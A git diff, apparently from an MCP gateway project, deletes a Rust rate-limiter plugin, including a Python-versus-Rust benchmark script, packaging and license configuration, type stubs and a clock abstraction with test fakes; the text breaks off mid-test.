- ) - }); - } - }); - }) - }); - } -} - -criterion_group!( - benches, - bench_fixed_window, - bench_token_bucket, - bench_sliding_window, - bench_multi_dim, - bench_fixed_window_hot_counter, - bench_fixed_window_blocked, - bench_fixed_window_many_keys, - bench_fixed_window_concurrent, -); -criterion_main!(benches); diff --git a/plugins_rust/rate_limiter/compare_performance.py b/plugins_rust/rate_limiter/compare_performance.py deleted file mode 100755 index d42081d750..0000000000 --- a/plugins_rust/rate_limiter/compare_performance.py +++ /dev/null @@ -1,621 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- -"""Compare Python and Rust rate limiter hook performance. - -This benchmark measures the real plugin hook path, not just the raw Rust engine. -It mirrors the comparison style used by other Rust plugins in this repository by -reporting Python-vs-Rust timings in ms/iteration for the same hook inputs. - -Design choices for fairness: -- use fresh identities per iteration (latency mode) so counters do not - accumulate differently between implementations -- compare the same hook (`prompt_pre_fetch` / `tool_pre_invoke`) with the same - plugin config, only toggling whether the Rust engine is active -- use a dedicated Redis DB (default: /15) so the benchmark does not disturb the - running local stack - -Modes: -- latency (default): per-call latency comparison, sequential -- throughput: max ops/sec comparison at various concurrency levels using - ThreadPoolExecutor — demonstrates Rust's GIL-release advantage - -Options: -- --dimensions 1|3: number of rate limit dimensions (1=user only, 3=user+tenant+tool) -- --workload allow|mixed: allow-only or mixed allow/block -- --concurrency N: thread count for throughput mode -""" - -# Future -from __future__ import annotations - -# Standard -import argparse -import asyncio -from dataclasses import dataclass -from pathlib import Path -import statistics -import sys -import time -from typing import Any, Sequence -from uuid import uuid4 - -# Third-Party -from pydantic import BaseModel - -ROOT = Path(__file__).resolve().parents[2] -if str(ROOT) not in sys.path: - sys.path.insert(0, str(ROOT)) - -# First-Party -from mcpgateway.plugins.framework import GlobalContext, PluginConfig, PluginContext, PromptPrehookPayload, ToolPreInvokePayload -from plugins.rate_limiter.rate_limiter import RateLimiterPlugin - -try: - # Third-Party - import redis.asyncio as aioredis -except ImportError: # pragma: no cover - dependency exists in repo venv - aioredis = None - - -class BenchmarkResult(BaseModel): - """One measured implementation result for a scenario.""" - - implementation: str - mean_ms: float - median_ms: float - p95_ms: float - - -class ThroughputResult(BaseModel): - """Throughput benchmark result for one concurrency level.""" - - implementation: str - threads: int - ops_per_sec: float - total_ops: int - duration_sec: float - - -@dataclass(frozen=True) -class Scenario: - """A benchmark scenario.""" - - algorithm: str - backend: str - hook: str - dimensions: int = 1 - workload: str = "allow" - - -def _percentile(values: Sequence[float], percentile: float) -> float: - """Return a simple percentile from a sorted float sequence.""" - if not values: - return 0.0 - ordered = sorted(values) - index = min(len(ordered) - 1, max(0, int(round((len(ordered) - 1) * percentile)))) - return ordered[index] - - -def _make_plugin_config( - algorithm: str, - backend: str, - redis_url: str, - redis_key_prefix: str, - dimensions: int = 1, - workload: str = "allow", -) -> PluginConfig: - """Create a plugin config for the benchmark. - - dimensions=1: by_user only - dimensions=3: by_user + by_tenant + by_tool (3-dimension batch) - - workload="allow": high limit so all requests are allowed - workload="mixed": low limit so some requests are blocked - """ - user_rate = "3/m" if workload == "mixed" else "600000/m" - config: dict[str, Any] = { - "algorithm": algorithm, - "backend": backend, - "redis_url": redis_url, - "redis_key_prefix": redis_key_prefix, - "redis_fallback": False, - } - if dimensions == 0: - # Baseline: no rate limits configured — plugin short-circuits immediately. - pass - else: - config["by_user"] = user_rate - if dimensions >= 3: - config["by_tenant"] = "6000000/m" if workload != "mixed" else "6/m" - config["by_tool"] = {"benchmark_tool": "3000000/m" if workload != "mixed" else "5/m"} - return PluginConfig( - name=f"rate-limiter-bench-{algorithm}-{backend}-d{dimensions}-{workload}", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=["prompt_pre_fetch", "tool_pre_invoke"], - config=config, - ) - - -def _build_plugin( - algorithm: str, - backend: str, - use_rust: bool, - redis_url: str, - redis_key_prefix: str, - dimensions: int = 1, - workload: str = "allow", -) -> RateLimiterPlugin: - """Instantiate a plugin and force the requested implementation path.""" - plugin = RateLimiterPlugin(_make_plugin_config(algorithm, backend, redis_url, redis_key_prefix, dimensions, workload)) - if not use_rust: - plugin._rust_engine = None - elif plugin._rust_engine is None: - raise RuntimeError("Rust rate limiter engine is not available. Run: make -C plugins_rust/rate_limiter install") - return plugin - - -def _build_prompt_contexts(count: int, dimensions: int = 1) -> list[PluginContext]: - """Build prompt benchmark contexts with fresh user identities.""" - if dimensions >= 3: - return [PluginContext(global_context=GlobalContext(request_id=f"prompt-{i}", user=f"prompt-user-{i}@example.com", tenant_id="bench-tenant")) for i in range(count)] - return [PluginContext(global_context=GlobalContext(request_id=f"prompt-{i}", user=f"prompt-user-{i}@example.com")) for i in range(count)] - - -def _build_tool_contexts(count: int, dimensions: int = 1) -> list[PluginContext]: - """Build tool benchmark contexts with fresh user identities.""" - if dimensions >= 3: - return [PluginContext(global_context=GlobalContext(request_id=f"tool-{i}", user=f"tool-user-{i}@example.com", tenant_id="bench-tenant")) for i in range(count)] - return [PluginContext(global_context=GlobalContext(request_id=f"tool-{i}", user=f"tool-user-{i}@example.com")) for i in range(count)] - - -async def _invoke_hook(plugin: RateLimiterPlugin, hook: str, payload: Any, context: PluginContext) -> Any: - """Invoke the selected plugin hook.""" - if hook == "prompt_pre_fetch": - return await plugin.prompt_pre_fetch(payload, context) - return await plugin.tool_pre_invoke(payload, context) - - -async def _cleanup_plugin(plugin: RateLimiterPlugin) -> None: - """Cancel any sweep task left behind by the memory backend.""" - rate_backend = getattr(plugin, "_rate_backend", None) - sweep_task = getattr(rate_backend, "_sweep_task", None) - if sweep_task is not None: - try: - sweep_task.cancel() - await sweep_task - except (asyncio.CancelledError, RuntimeError): - # RuntimeError: event loop is closed — happens when the task was - # created on a worker thread's event loop (throughput mode). - pass - except Exception: - pass - - -async def _flush_redis(redis_url: str) -> None: - """Flush the benchmark Redis DB for a clean run.""" - if aioredis is None: - return - client = aioredis.from_url(redis_url, decode_responses=False) - try: - await client.flushdb() - finally: - await client.aclose() - - -async def _redis_available(redis_url: str) -> bool: - """Check whether the benchmark Redis target is reachable.""" - if aioredis is None: - return False - client = aioredis.from_url(redis_url, decode_responses=False) - try: - return bool(await client.ping()) - except Exception: - return False - finally: - await client.aclose() - - -async def _parity_smoke_test(algorithm: str, backend: str, redis_url: str) -> None: - """Quick sanity-check that Python and Rust agree on an allow/block sequence.""" - redis_key_prefix = f"rlbench-parity-{algorithm}-{backend}-{uuid4().hex}" - if backend == "redis": - await _flush_redis(redis_url) - - plugin_python = RateLimiterPlugin( - PluginConfig( - name="rate-limiter-parity-python", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=["tool_pre_invoke"], - config={ - "algorithm": algorithm, - "backend": backend, - "by_user": "3/m", - "redis_url": redis_url, - "redis_key_prefix": redis_key_prefix, - "redis_fallback": False, - }, - ) - ) - plugin_python._rust_engine = None - - plugin_rust = RateLimiterPlugin( - PluginConfig( - name="rate-limiter-parity-rust", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=["tool_pre_invoke"], - config={ - "algorithm": algorithm, - "backend": backend, - "by_user": "3/m", - "redis_url": redis_url, - "redis_key_prefix": redis_key_prefix, - "redis_fallback": False, - }, - ) - ) - - if plugin_rust._rust_engine is None: - raise RuntimeError("Rust engine unavailable during parity check") - - payload = ToolPreInvokePayload(name="bench_tool", args={}) - python_sequence: list[bool] = [] - rust_sequence: list[bool] = [] - - for idx in range(4): - ctx_python = PluginContext(global_context=GlobalContext(request_id=f"parity-py-{idx}", user="same-user@example.com")) - ctx_rust = PluginContext(global_context=GlobalContext(request_id=f"parity-rs-{idx}", user="same-user@example.com")) - python_result = await plugin_python.tool_pre_invoke(payload, ctx_python) - rust_result = await plugin_rust.tool_pre_invoke(payload, ctx_rust) - python_sequence.append(python_result.continue_processing) - rust_sequence.append(rust_result.continue_processing) - - await _cleanup_plugin(plugin_python) - await _cleanup_plugin(plugin_rust) - - if python_sequence != rust_sequence: - raise AssertionError(f"Parity failed for {algorithm}/{backend}: python={python_sequence}, rust={rust_sequence}") - - -# --------------------------------------------------------------------------- -# Latency mode (original sequential benchmark) -# --------------------------------------------------------------------------- - - -async def _benchmark_scenario( - scenario: Scenario, - implementation: str, - iterations: int, - warmup: int, - redis_url: str, -) -> BenchmarkResult: - """Benchmark one scenario for either the Python or Rust path.""" - use_rust = implementation == "Rust" - redis_key_prefix = f"rlbench-{scenario.algorithm}-{scenario.backend}-{scenario.hook}-{implementation.lower()}-{uuid4().hex}" - - if scenario.backend == "redis": - await _flush_redis(redis_url) - - plugin = _build_plugin( - algorithm=scenario.algorithm, - backend=scenario.backend, - use_rust=use_rust, - redis_url=redis_url, - redis_key_prefix=redis_key_prefix, - dimensions=scenario.dimensions, - workload=scenario.workload, - ) - - total_calls = iterations + warmup - if scenario.hook == "prompt_pre_fetch": - payload = PromptPrehookPayload(prompt_id="benchmark_tool", args={}) - contexts = _build_prompt_contexts(total_calls, scenario.dimensions) - else: - payload = ToolPreInvokePayload(name="benchmark_tool", args={}) - contexts = _build_tool_contexts(total_calls, scenario.dimensions) - - # Warmup - for idx in range(warmup): - result = await _invoke_hook(plugin, scenario.hook, payload, contexts[idx]) - if scenario.workload == "allow" and not result.continue_processing: - raise AssertionError(f"Unexpected rate-limit during warmup for {scenario.algorithm}/{scenario.backend}/{scenario.hook}") - - times_ms: list[float] = [] - for idx in range(warmup, total_calls): - start = time.perf_counter() - await _invoke_hook(plugin, scenario.hook, payload, contexts[idx]) - elapsed_ms = (time.perf_counter() - start) * 1000 - times_ms.append(elapsed_ms) - - await _cleanup_plugin(plugin) - - return BenchmarkResult( - implementation=implementation, - mean_ms=statistics.mean(times_ms), - median_ms=statistics.median(times_ms), - p95_ms=_percentile(times_ms, 0.95), - ) - - -# --------------------------------------------------------------------------- -# Throughput mode (concurrent threads — demonstrates GIL-release advantage) -# --------------------------------------------------------------------------- - - -async def _run_concurrent_batch( - plugin: RateLimiterPlugin, - scenario: Scenario, - concurrency: int, - iterations_per_task: int, -) -> list[float]: - """Fire ``concurrency`` async tasks each running ``iterations_per_task`` calls. - - Returns a flat list of per-call times (ms). - """ - hook = scenario.hook - if hook == "prompt_pre_fetch": - payload = PromptPrehookPayload(prompt_id="benchmark_tool", args={}) - else: - payload = ToolPreInvokePayload(name="benchmark_tool", args={}) - - sem = asyncio.Semaphore(concurrency) - all_times: list[list[float]] = [[] for _ in range(concurrency)] - - async def _worker(worker_id: int) -> None: - for i in range(iterations_per_task): - async with sem: - ctx = PluginContext( - global_context=GlobalContext( - request_id=f"c-{worker_id}-{i}", - user=f"c-{worker_id}-{i}@bench.test", - tenant_id="bench-tenant" if scenario.dimensions >= 3 else None, - ) - ) - start = time.perf_counter() - await _invoke_hook(plugin, hook, payload, ctx) - all_times[worker_id].append((time.perf_counter() - start) * 1000) - - await asyncio.gather(*[_worker(w) for w in range(concurrency)]) - return [t for task_times in all_times for t in task_times] - - -async def _benchmark_throughput( - scenario: Scenario, - implementation: str, - concurrency: int, - iterations_per_task: int, - redis_url: str, -) -> ThroughputResult: - """Measure concurrent async throughput at a given concurrency level. - - Runs ``concurrency`` async tasks, each firing ``iterations_per_task`` - hook calls through the same plugin. This mirrors production uvicorn - usage where multiple request handlers share a plugin concurrently. - """ - use_rust = implementation == "Rust" - redis_key_prefix = f"rlbench-tp-{scenario.algorithm}-{implementation.lower()}-{uuid4().hex}" - - if scenario.backend == "redis": - await _flush_redis(redis_url) - - plugin = _build_plugin( - algorithm=scenario.algorithm, - backend=scenario.backend, - use_rust=use_rust, - redis_url=redis_url, - redis_key_prefix=redis_key_prefix, - dimensions=scenario.dimensions, - workload=scenario.workload, - ) - - start = time.monotonic() - times_ms = await _run_concurrent_batch(plugin, scenario, concurrency, iterations_per_task) - elapsed = time.monotonic() - start - total_ops = len(times_ms) - - await _cleanup_plugin(plugin) - - return ThroughputResult( - implementation=implementation, - threads=concurrency, - ops_per_sec=total_ops / elapsed if elapsed > 0 else 0, - total_ops=total_ops, - duration_sec=elapsed, - ) - - -# --------------------------------------------------------------------------- -# Run modes -# --------------------------------------------------------------------------- - - -async def _run_latency(args: argparse.Namespace, redis_enabled: bool) -> None: - """Run latency-mode benchmarks.""" - # --- Baseline: no rate limits configured --- - if args.baseline: - hook = args.hooks[0] - baseline_scenario = Scenario(algorithm="fixed_window", backend="memory", hook=hook, dimensions=0, workload="allow") - print("=" * 88) - print(f"BASELINE (no rate limits) / {hook}") - print("=" * 88) - baseline_result = await _benchmark_scenario(baseline_scenario, "Python", args.iterations, args.warmup, args.redis_url) - print(f" Baseline: mean {baseline_result.mean_ms:.4f} ms | median {baseline_result.median_ms:.4f} ms | p95 {baseline_result.p95_ms:.4f} ms") - print() - else: - baseline_result = None - - # --- Per-scenario benchmarks --- - scenarios = [ - Scenario(algorithm=algorithm, backend=backend, hook=hook, dimensions=args.dimensions, workload=args.workload) - for algorithm in ("fixed_window", "sliding_window", "token_bucket") - for backend in args.backends - for hook in args.hooks - ] - - for scenario in scenarios: - if scenario.backend == "redis" and not redis_enabled: - continue - print("=" * 88) - label = f"{scenario.algorithm} / {scenario.backend} / {scenario.hook}" - if scenario.dimensions > 1: - label += f" / {scenario.dimensions}d" - if scenario.workload != "allow": - label += f" / {scenario.workload}" - print(f"Scenario: {label}") - print("=" * 88) - python_result = await _benchmark_scenario(scenario, "Python", args.iterations, args.warmup, args.redis_url) - rust_result = await _benchmark_scenario(scenario, "Rust", args.iterations, args.warmup, args.redis_url) - speedup = python_result.mean_ms / rust_result.mean_ms if rust_result.mean_ms else 0.0 - print(f" Python: mean {python_result.mean_ms:.3f} ms | median {python_result.median_ms:.3f} ms | p95 {python_result.p95_ms:.3f} ms") - print(f" Rust: mean {rust_result.mean_ms:.3f} ms | median {rust_result.median_ms:.3f} ms | p95 {rust_result.p95_ms:.3f} ms") - print(f" Speedup: {speedup:.2f}x faster") - if baseline_result and baseline_result.mean_ms > 0: - py_overhead = python_result.mean_ms - baseline_result.mean_ms - rs_overhead = rust_result.mean_ms - baseline_result.mean_ms - print(f" Rate-limiter overhead: Python +{py_overhead:.3f} ms | Rust +{rs_overhead:.3f} ms") - print() - - -async def _run_throughput(args: argparse.Namespace, redis_enabled: bool) -> None: - """Run throughput-mode benchmarks at various concurrency levels. - - Uses asyncio.gather with a shared plugin to mirror production uvicorn - concurrency where multiple request handlers share the same plugin. - """ - concurrency_levels = [1, 4, 16, 64] - if args.concurrency: - concurrency_levels = [args.concurrency] - - iterations_per_task = max(100, args.iterations // 4) - - for algorithm in ("fixed_window",): # throughput mode uses one algorithm to keep output manageable - for backend in args.backends: - if backend == "redis" and not redis_enabled: - continue - hook = args.hooks[0] - scenario = Scenario(algorithm=algorithm, backend=backend, hook=hook, dimensions=args.dimensions, workload=args.workload) - - print("=" * 88) - label = f"THROUGHPUT: {algorithm} / {backend} / {hook}" - if scenario.dimensions > 1: - label += f" / {scenario.dimensions}d" - if scenario.workload != "allow": - label += f" / {scenario.workload}" - print(label) - print(f" ({iterations_per_task} iterations per task)") - print("=" * 88) - print(f" {'Tasks':>7} {'Python ops/s':>14} {'Rust ops/s':>14} {'Speedup':>8}") - print(f" {'-----':>7} {'-' * 14:>14} {'-' * 14:>14} {'--------':>8}") - - for concurrency in concurrency_levels: - py_result = await _benchmark_throughput(scenario, "Python", concurrency, iterations_per_task, args.redis_url) - rs_result = await _benchmark_throughput(scenario, "Rust", concurrency, iterations_per_task, args.redis_url) - speedup = rs_result.ops_per_sec / py_result.ops_per_sec if py_result.ops_per_sec else 0.0 - print(f" {concurrency:>7} {py_result.ops_per_sec:>14,.0f} {rs_result.ops_per_sec:>14,.0f} {speedup:>7.2f}x") - - print() - - -async def _run(args: argparse.Namespace) -> int: - """Run the benchmark suite.""" - redis_enabled = False - if "redis" in args.backends: - redis_enabled = await _redis_available(args.redis_url) - if not redis_enabled: - print(f" Redis unavailable at {args.redis_url}; skipping Redis scenarios") - - print("Rate Limiter Performance Comparison (Plugin Hook Path)") - print(f"Mode: {args.mode}") - print(f"Iterations: {args.iterations} (+ {args.warmup} warmup)") - print(f"Hooks: {', '.join(args.hooks)}") - print(f"Backends: {', '.join(args.backends)}") - print(f"Dimensions: {args.dimensions}") - print(f"Workload: {args.workload}") - if args.mode == "throughput": - print(f"Concurrency: {args.concurrency or '1,2,4,8'}") - print(f"Redis URL: {args.redis_url}") - print() - - # Parity checks - for algorithm in ("fixed_window", "sliding_window", "token_bucket"): - for backend in args.backends: - if backend == "redis" and not redis_enabled: - continue - await _parity_smoke_test(algorithm, backend, args.redis_url) - - print("Parity smoke checks: pass") - print() - - if args.mode == "latency": - await _run_latency(args, redis_enabled) - elif args.mode == "throughput": - await _run_throughput(args, redis_enabled) - - print("Comparison complete") - return 0 - - -def _parse_args() -> argparse.Namespace: - """Parse command-line flags.""" - parser = argparse.ArgumentParser(description="Rate limiter Python vs Rust hook-path benchmark") - parser.add_argument("--iterations", type=int, default=1000, help="Measured iterations per scenario (latency mode)") - parser.add_argument("--warmup", type=int, default=100, help="Warmup iterations per scenario (latency mode)") - parser.add_argument( - "--redis-url", - default="redis://localhost:6379/15", - help="Dedicated Redis URL for benchmark scenarios (defaults to DB 15)", - ) - parser.add_argument( - "--hooks", - nargs="+", - default=["prompt_pre_fetch", "tool_pre_invoke"], - choices=["prompt_pre_fetch", "tool_pre_invoke"], - help="Hooks to benchmark", - ) - parser.add_argument( - "--backends", - nargs="+", - default=["memory", "redis"], - choices=["memory", "redis"], - help="Backends to benchmark", - ) - parser.add_argument( - "--mode", - default="latency", - choices=["latency", "throughput"], - help="Benchmark mode: latency (sequential per-call) or throughput (concurrent ops/sec)", - ) - parser.add_argument( - "--dimensions", - type=int, - default=1, - choices=[1, 3], - help="Number of rate limit dimensions: 1 (user only) or 3 (user+tenant+tool)", - ) - parser.add_argument( - "--workload", - default="allow", - choices=["allow", "mixed"], - help="Workload type: allow (all requests pass) or mixed (some blocked)", - ) - parser.add_argument( - "--concurrency", - type=int, - default=None, - help="Thread count for throughput mode (default: sweep 1,2,4,8)", - ) - parser.add_argument( - "--baseline", - action="store_true", - default=False, - help="Include a baseline run (no rate limits) to measure plugin overhead", - ) - return parser.parse_args() - - -def main() -> int: - """Run the async benchmark entrypoint.""" - return asyncio.run(_run(_parse_args())) - - -if __name__ == "__main__": - raise SystemExit(main()) diff --git a/plugins_rust/rate_limiter/deny.toml b/plugins_rust/rate_limiter/deny.toml deleted file mode 100644 index 142f5157ff..0000000000 --- a/plugins_rust/rate_limiter/deny.toml +++ /dev/null @@ -1,27 +0,0 @@ -# Cargo-deny config: license and policy checks for this crate. -# See https://embarkstudios.github.io/cargo-deny/ - -[licenses] -unused-allowed-license = "allow" -confidence-threshold = 0.95 -allow = [ - # Currently used across our Rust projects - "Apache-2.0", - "BSD-2-Clause", - "BSD-3-Clause", - "BSL-1.0", - "CC0-1.0", - "ISC", - "LGPL-2.1-or-later", - "MIT", - "MIT-0", - "OpenSSL", - "Unicode-3.0", - "Unicode-DFS-2016", - "Unlicense", - "Zlib", - # Common safe licenses in the Rust ecosystem - "0BSD", - "Apache-2.0 WITH LLVM-exception", - "Unicode-DFS-2015", -] diff --git a/plugins_rust/rate_limiter/pyproject.toml b/plugins_rust/rate_limiter/pyproject.toml deleted file mode 100644 index 9265649248..0000000000 --- a/plugins_rust/rate_limiter/pyproject.toml +++ /dev/null @@ -1,22 +0,0 @@ -[build-system] -requires = ["maturin>=1.4,<2.0"] -build-backend = "maturin" - -[project] -name = "mcpgateway-rate-limiter" -version = "0.1.0" -description = "High-performance rate limiter engine for MCP Gateway" -authors = [{ name = "ContextForge Contributors" }] -license = { text = "Apache-2.0" } -requires-python = ">=3.11" -classifiers = [ - "Programming Language :: Rust", - "Programming Language :: Python :: Implementation :: CPython", - "Programming Language :: Python :: 3.11", - "Programming Language :: Python :: 3.12", -] - -[tool.maturin] -module-name = "rate_limiter_rust" -python-source = "python" -features = ["pyo3/extension-module"] diff --git a/plugins_rust/rate_limiter/python/rate_limiter_rust/__init__.pyi b/plugins_rust/rate_limiter/python/rate_limiter_rust/__init__.pyi deleted file mode 100644 index 5082a9f06c..0000000000 --- a/plugins_rust/rate_limiter/python/rate_limiter_rust/__init__.pyi +++ /dev/null @@ -1,140 +0,0 @@ -# This file is automatically generated by pyo3_stub_gen -# ruff: noqa: E501, F401, F403, F405 - -import builtins -import typing -__all__ = [ - "EvalDimension", - "EvalResult", - "RateLimiterEngine", -] - -@typing.final -class EvalDimension: - r""" - The outcome of a single active dimension, exposed to Python for - per-dimension inspection (e.g. which dimension blocked the request). - """ - @property - def remaining(self) -> builtins.int: - r""" - Requests remaining for this active dimension. - """ - @property - def reset_timestamp(self) -> builtins.int: - r""" - Unix timestamp when this dimension resets or refills. - """ - @property - def retry_after(self) -> typing.Optional[builtins.int]: - r""" - Seconds until retry — populated only for blocked dimensions. - """ - -@typing.final -class EvalResult: - r""" - The aggregated result returned to Python via `evaluate_many()`. - - Contains the most restrictive outcome across all active dimensions - (min remaining, earliest unblock among blocked dimensions — matching - Python `_select_most_restrictive`). - """ - @property - def allowed(self) -> builtins.bool: - r""" - `True` if all active dimensions allow the request. - """ - @property - def limit(self) -> builtins.int: - r""" - Configured limit for the most restrictive active dimension. - """ - @property - def remaining(self) -> builtins.int: - r""" - Remaining requests for the most restrictive active dimension. - """ - @property - def reset_timestamp(self) -> builtins.int: - r""" - Unix timestamp when the most restrictive dimension resets. - """ - @property - def retry_after(self) -> typing.Optional[builtins.int]: - r""" - Seconds until reset — populated only when `allowed == False`. - """ - @property - def violated_dimensions(self) -> builtins.list[EvalDimension]: - r""" - Per-dimension outcomes that were blocked for this request. - """ - @property - def allowed_dimensions(self) -> builtins.list[EvalDimension]: - r""" - Per-dimension outcomes that still allowed this request. - """ - def __repr__(self) -> builtins.str: ... - -@typing.final -class RateLimiterEngine: - r""" - High-performance rate limiter engine. - - Construct once per plugin instance (`__init__`), then call - `check()` / `check_async()` on every hook invocation. - - Backend is selected at init time from the config dict: - - `backend: "memory"` (default) — in-process counting via `MemoryStore` - - `backend: "redis"` — Rust owns the Redis connection; same batch Lua - scripts as the Python `RedisBackend`, one EVAL per hook invocation - """ - def __new__(cls, config: dict) -> RateLimiterEngine: - r""" - Construct from the Python config dict. - - Parses all rate strings and normalises `by_tool` keys at init time — - never on the request path (IFACE-01, IFACE-05). - - Extra keys consumed here (not part of `EngineConfig`): - - `backend`: `"memory"` (default) or `"redis"` - - `redis_url`: required when `backend = "redis"` - - `redis_key_prefix`: key namespace prefix (default `"rl"`) - """ - def evaluate_many(self, checks: typing.Sequence[tuple[builtins.str, builtins.int, builtins.int]], now_unix: builtins.int) -> EvalResult: - r""" - Evaluate all active dimensions in a single call (ARCH-01, IFACE-02). - - `checks` is a list of `(key, limit_count, window_nanos)` tuples built - by the Python wrapper from the request context. - - `now_unix` is `int(time.time())` from Python — passing it here means - Python test mocks of `time.time()` propagate to header timestamps (CORR-02). - - Returns the most restrictive `EvalResult` across all dimensions (ARCH-02). - """ - def evaluate_many_async(self, checks: typing.Sequence[tuple[builtins.str, builtins.int, builtins.int]], now_unix: builtins.int) -> typing.Any: - r""" - Evaluate all active dimensions asynchronously. - - Intended for Redis-backed deployments so Python async hooks can await - the Rust Redis path without blocking the event loop. - """ - def check(self, user: builtins.str, tenant: typing.Optional[builtins.str], tool: builtins.str, now_unix: builtins.int, include_retry_after: builtins.bool) -> tuple[builtins.bool, dict, dict]: - r""" - High-level check: builds dimension keys internally, evaluates, and - returns pre-built Python dicts for headers and metadata. - - This eliminates all per-attribute PyO3 accesses on the Python side. - The Python wrapper calls this once per hook invocation instead of - `evaluate_many()` + `_rust_to_plugin_meta()` + `_rust_to_plugin_headers()`. - - Returns `(allowed, headers_dict, meta_dict)`. - """ - def check_async(self, user: builtins.str, tenant: typing.Optional[builtins.str], tool: builtins.str, now_unix: builtins.int, include_retry_after: builtins.bool) -> typing.Any: - r""" - Async variant of `check()` for Redis-backed deployments. - - Returns an awaitable that resolves to `(allowed, headers_dict, meta_dict)`. - """ diff --git a/plugins_rust/rate_limiter/src/bin/stub_gen.rs b/plugins_rust/rate_limiter/src/bin/stub_gen.rs deleted file mode 100644 index 495186be9c..0000000000 --- a/plugins_rust/rate_limiter/src/bin/stub_gen.rs +++ /dev/null @@ -1,13 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// Generates Python type stubs (.pyi) for the rate_limiter_rust module. -// Run with: cargo run --bin stub_gen - -use rate_limiter_rust::stub_info; - -fn main() { - let stub_info = stub_info().expect("Failed to get stub info"); - stub_info.generate().expect("Failed to generate stub file"); - println!("✓ Generated stub files successfully"); -} diff --git a/plugins_rust/rate_limiter/src/clock.rs b/plugins_rust/rate_limiter/src/clock.rs deleted file mode 100644 index 044e682fd7..0000000000 --- a/plugins_rust/rate_limiter/src/clock.rs +++ /dev/null @@ -1,193 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// Clock abstraction for rate limiter engine. -// -// All internal rate math uses `Clock::now_monotonic()` (nanoseconds). -// Wall-clock Unix timestamps (for response headers) use `Clock::now_unix_secs()`. -// -// Tests inject `FakeClock` to make all timing-dependent assertions deterministic. - -/// Monotonic time in nanoseconds since an arbitrary epoch. -pub type Nanos = u64; - -/// Unix timestamp in whole seconds (for X-RateLimit-Reset headers). -pub type UnixSecs = i64; - -/// Clock abstraction injected into the engine at construction time. -pub trait Clock: Send + Sync + 'static { - /// Monotonic nanosecond counter — used for all rate math. - fn now_monotonic(&self) -> Nanos; - - /// Wall-clock Unix seconds — used only for header timestamps. - fn now_unix_secs(&self) -> UnixSecs; -} - -// --------------------------------------------------------------------------- -// Real clock — delegates to std::time -// --------------------------------------------------------------------------- - -/// Production clock backed by `std::time`. -#[derive(Debug, Clone, Default)] -pub struct SystemClock; - -impl Clock for SystemClock { - fn now_monotonic(&self) -> Nanos { - use std::sync::OnceLock; - use std::time::{Duration, Instant, SystemTime, UNIX_EPOCH}; - - // Instant is monotonic; we anchor it to a fixed start to get nanoseconds. - // We use a process-global anchor so monotonic values are comparable - // across threads — required because MemoryStore is shared via RwLock. - static ANCHOR: OnceLock<(Instant, u64)> = OnceLock::new(); - let (anchor_instant, anchor_nanos) = ANCHOR.get_or_init(|| { - let nanos = SystemTime::now() - .duration_since(UNIX_EPOCH) - .unwrap_or(Duration::ZERO) - .as_nanos() as u64; - (Instant::now(), nanos) - }); - let elapsed = anchor_instant.elapsed().as_nanos() as u64; - anchor_nanos + elapsed - } - - fn now_unix_secs(&self) -> UnixSecs { - use std::time::{Duration, SystemTime, UNIX_EPOCH}; - SystemTime::now() - .duration_since(UNIX_EPOCH) - .unwrap_or(Duration::ZERO) - .as_secs() as i64 - } -} - -// --------------------------------------------------------------------------- -// Fake clock — for deterministic tests -// --------------------------------------------------------------------------- - -use std::sync::Arc; -use std::sync::atomic::{AtomicI64, AtomicU64, Ordering}; - -/// Shareable handle to advance a `FakeClock` from test code. -#[derive(Clone, Debug)] -pub struct FakeClockHandle { - monotonic_nanos: Arc, - unix_secs: Arc, -} - -impl FakeClockHandle { - /// Advance the monotonic clock by `nanos` nanoseconds. - pub fn advance_nanos(&self, nanos: u64) { - self.monotonic_nanos.fetch_add(nanos, Ordering::SeqCst); - } - - /// Advance both clocks by `secs` seconds. - pub fn advance_secs(&self, secs: u64) { - self.monotonic_nanos - .fetch_add(secs * 1_000_000_000, Ordering::SeqCst); - self.unix_secs.fetch_add(secs as i64, Ordering::SeqCst); - } - - /// Set the Unix wall-clock to an absolute value (for header assertions). - pub fn set_unix_secs(&self, secs: i64) { - self.unix_secs.store(secs, Ordering::SeqCst); - } - - /// Read the current monotonic value. - pub fn monotonic_nanos(&self) -> u64 { - self.monotonic_nanos.load(Ordering::SeqCst) - } - - /// Read the current Unix seconds value. - pub fn unix_secs(&self) -> i64 { - self.unix_secs.load(Ordering::SeqCst) - } -} - -/// A `Clock` implementation driven by atomics — suitable for concurrent tests. -pub struct FakeClock { - monotonic_nanos: Arc, - unix_secs: Arc, -} - -impl FakeClock { - /// Create a `FakeClock` starting at the given Unix epoch and a matching - /// monotonic counter, returning both the clock and a control handle. - pub fn new(start_unix_secs: i64) -> (Self, FakeClockHandle) { - let mono = Arc::new(AtomicU64::new(start_unix_secs as u64 * 1_000_000_000)); - let wall = Arc::new(AtomicI64::new(start_unix_secs)); - let clock = FakeClock { - monotonic_nanos: Arc::clone(&mono), - unix_secs: Arc::clone(&wall), - }; - let handle = FakeClockHandle { - monotonic_nanos: mono, - unix_secs: wall, - }; - (clock, handle) - } -} - -impl Clock for FakeClock { - fn now_monotonic(&self) -> Nanos { - self.monotonic_nanos.load(Ordering::SeqCst) - } - - fn now_unix_secs(&self) -> UnixSecs { - self.unix_secs.load(Ordering::SeqCst) - } -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn fake_clock_starts_at_given_epoch() { - let (clock, handle) = FakeClock::new(1_000_000); - assert_eq!(clock.now_unix_secs(), 1_000_000); - assert_eq!(clock.now_monotonic(), 1_000_000 * 1_000_000_000); - let _ = handle; - } - - #[test] - fn fake_clock_advances_in_sync() { - let (clock, handle) = FakeClock::new(1_000_000); - handle.advance_secs(60); - assert_eq!(clock.now_unix_secs(), 1_000_060); - assert_eq!(clock.now_monotonic(), (1_000_000 + 60) * 1_000_000_000); - } - - #[test] - fn fake_clock_advance_nanos_does_not_move_wall() { - let (clock, handle) = FakeClock::new(1_000_000); - handle.advance_nanos(500_000_000); // 0.5 s - assert_eq!(clock.now_unix_secs(), 1_000_000); // wall unchanged - assert_eq!( - clock.now_monotonic(), - 1_000_000 * 